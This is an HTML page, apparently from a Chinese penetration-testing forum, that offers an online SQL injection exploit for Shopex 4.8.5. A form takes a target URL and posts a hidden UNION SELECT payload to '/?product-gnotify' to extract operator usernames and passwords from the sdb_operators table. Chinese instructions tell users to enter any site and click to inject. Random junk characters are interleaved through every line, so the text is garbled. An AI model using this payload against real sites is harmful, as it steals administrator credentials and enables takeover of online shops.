<center>
7 f6 e+ x2 C1 J8 H<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
8 X! B- L8 ]; Q+ i, v<form action="" method="post" name="submit_url">; e4 C3 `! G0 t7 P" U" G9 J( V
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
3 g. Y! C, z O$ X& f6 S8 B) F- @<input type="hidden" name="goods[goods_id]" value="3">5 i1 X) I+ l! z: u# I1 N
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">6 _4 h* L+ A M# @. J& u
<input type="submit" value="给我注入" onclick=fsubmit()>
# p- v2 V0 G# Y7 ~1 i. H5 [</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com& {$ ^8 G; o7 L" b( ~5 i+ H
6 l& M4 V5 @- T0 S& L0 S) ^) W
<script>
" W4 ^ S$ v0 ufunction fsubmit(){
) Q9 `* g" q, E( A R4 iform = document.forms[0];
' u8 `& a, F1 aform.action = form.url.value+'/?product-gnotify'; - D7 x) f6 }! @0 g1 F( _
form.submit(); & p0 `5 g+ S) y1 ]! S. n" h0 o
}
' ^: M$ u) x* ?# z</script>
6 a3 T% n. F0 C; h |